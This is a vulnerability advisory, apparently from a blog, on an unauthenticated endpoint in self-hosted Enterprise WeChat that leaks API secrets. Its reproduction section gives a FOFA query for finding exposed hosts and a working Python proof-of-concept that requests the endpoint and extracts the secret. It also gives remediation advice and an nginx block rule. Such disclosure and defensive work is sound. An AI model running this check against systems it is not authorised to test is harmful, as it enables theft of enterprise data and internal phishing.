2023 Enterprise WeChat 0day Vulnerability Reappearance and Handling Suggestions

Disclaimer: Do not use the techniques in this article for illegal testing. Any direct or indirect consequences and losses caused by disseminating or using the information or tools provided in this article shall be borne by the user; adverse consequences have nothing to do with the article's author. This article is for educational purposes only.

1. Vulnerability overview

Vulnerability number: none assigned

The Enterprise WeChat 0day is an unauthorized access flaw in the /cgi-bin/gateway/agentinfo interface: the interface can be requested without authentication and returns sensitive information such as the enterprise WeChat secret (the API credential). With that credential an attacker can call the enterprise WeChat API and obtain the full set of enterprise data.

Vulnerability impact

① The full set of enterprise WeChat data and documents can be obtained.

② Using enterprise WeChat lightweight applications, phishing files and links can be pushed to staff internally.


2. Affected version

Affected versions: 2.5.x, and 2.6.930000 and below (self-hosted Enterprise WeChat)

Unaffected versions: 2.7.x, 2.8.x, 2.9.x

3. Vulnerability reproduction

FOFA query syntax: app="Tencent-Enterprise WeChat"

The interface is reached by requesting the path /cgi-bin/gateway/agentinfo on the target host, i.e. in the form https://xx.xx.xx.xx/cgi-bin/gateway/agentinfo. On an affected version the response to this unauthenticated request contains the secret directly.

Xiaolong POC detection script:

Xiaolong POC portal: Xiaolong POC tool
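As an added example (not the Xiaolong tool and not code from the original article), the following script performs the same check in a minimal form: it requests /cgi-bin/gateway/agentinfo without any credentials and reports the host as vulnerable only when the reply is HTTP 200 and carries a secret-like field. It assumes the endpoint answers a plain GET with a JSON body and that a vulnerable host includes a non-empty "secret" key in that body; the sample responses embedded below are constructed for the offline test, and the names `build_url`, `find_secret_fields`, `is_vulnerable` and `check_host` are the example's own.

```python
#!/usr/bin/env python3
"""Minimal unauthenticated-access check for the Enterprise WeChat
/cgi-bin/gateway/agentinfo interface (added example, not the Xiaolong tool).

Assumptions not stated on the original page:
  - the endpoint answers a plain GET with a JSON body;
  - a vulnerable host returns HTTP 200 with a non-empty "secret" field;
  - a fixed or WAF-protected host returns an error status or a body
    without any secret field.
"""
import json
import ssl
import sys
import urllib.error
import urllib.request
from urllib.parse import urljoin

AGENTINFO_PATH = "/cgi-bin/gateway/agentinfo"   # path named in the advisory

# Constructed sample responses for offline testing (not captured from a real host).
VULN_SAMPLE = '{"errcode":0,"agentid":1000002,"name":"oa","secret":"abcdEFGH1234"}'
SAFE_SAMPLE = '{"errcode":40001,"errmsg":"not authorized"}'


def build_url(base):
    """Accept 'host', 'host:port' or a full 'https://host' and return the check URL."""
    if not base.startswith(("http://", "https://")):
        base = "https://" + base
    return urljoin(base.rstrip("/") + "/", AGENTINFO_PATH.lstrip("/"))


def find_secret_fields(body):
    """Return {key: value} for every non-empty key containing 'secret' in the JSON body."""
    try:
        data = json.loads(body)
    except ValueError:
        return {}
    found = {}

    def walk(node):
        if isinstance(node, dict):
            for key, value in node.items():
                if "secret" in key.lower() and isinstance(value, str) and value:
                    found[key] = value
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(data)
    return found


def is_vulnerable(status, body):
    """Vulnerable only if the unauthenticated reply succeeded and leaked a secret."""
    return status == 200 and bool(find_secret_fields(body))


def redact(value, keep=4):
    """Keep a short prefix so the leaked secret is never written to logs in full."""
    return value[:keep] + "*" * max(0, len(value) - keep)


def check_host(base, timeout=10):
    """Send the unauthenticated GET and return (status, body); (0, '') on connection failure."""
    url = build_url(base)
    ctx = ssl.create_default_context()
    ctx.check_hostname = False      # self-hosted instances often use self-signed certs
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(url, headers={"User-Agent": "agentinfo-check/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")
    except urllib.error.URLError:
        return 0, ""


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} https://host")
    status, body = check_host(sys.argv[1])
    leaked = find_secret_fields(body) if status == 200 else {}
    if leaked:
        print("VULNERABLE: unauthenticated agentinfo leaked",
              {k: redact(v) for k, v in leaked.items()})
    else:
        print(f"not vulnerable, or endpoint protected (HTTP {status})")
```

Only run this against hosts you are authorized to test. The script prints a redacted prefix of any leaked value rather than the whole secret, so the check itself does not spread the credential into terminal history or logs.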

4. Remediation recommendations

① Wait for the official fix and upgrade; at the time of writing this is still a 0day with no vendor patch. Where possible, move to one of the unaffected versions (2.7.x or later).

② If the interface is reachable without authentication, the enterprise WeChat secret and other sensitive information can be obtained directly, which can lead to the full set of enterprise WeChat data and files being taken and to phishing files and links being pushed internally through enterprise WeChat lightweight applications. As a temporary mitigation, block access to /cgi-bin/gateway/agentinfo on the WAF, and contact the enterprise WeChat team for emergency response. If the interface has already been exposed, treat the secret as compromised. All units are requested to strengthen prevention.
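The article does not name a WAF product, so as an added example (not from the original article or from Tencent) here is the same temporary block expressed for an nginx reverse proxy placed in front of the self-hosted service; the upstream name and listen settings are assumptions for illustration.

```nginx
# Temporary mitigation: deny the leaking interface at the edge (added example).
# Assumes all client traffic to the Enterprise WeChat host passes through this
# proxy; if the service is reachable directly, the block does nothing.
upstream wecom_backend {
    server 10.0.0.10:443;              # assumed address of the self-hosted instance
}

server {
    listen 443 ssl;
    server_name wx.example.com;        # assumed hostname

    # Prefix match (^~) rather than exact match (=), so that variants such as
    # a trailing slash or extra path segments are blocked as well. nginx
    # matches locations on the decoded, normalized URI, so %-encoded forms of
    # the path hit this rule too.
    location ^~ /cgi-bin/gateway/agentinfo {
        return 403;
    }

    location / {
        proxy_pass https://wecom_backend;
        proxy_set_header Host $host;
    }
}
```

After applying the rule, re-run an unauthenticated request to the path and confirm it returns 403 instead of a JSON body. The block is a stopgap: it does not replace the vendor fix, and a secret that was already retrievable should be treated as exposed regardless.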


Source: blog.csdn.net/holyxp/article/details/132264915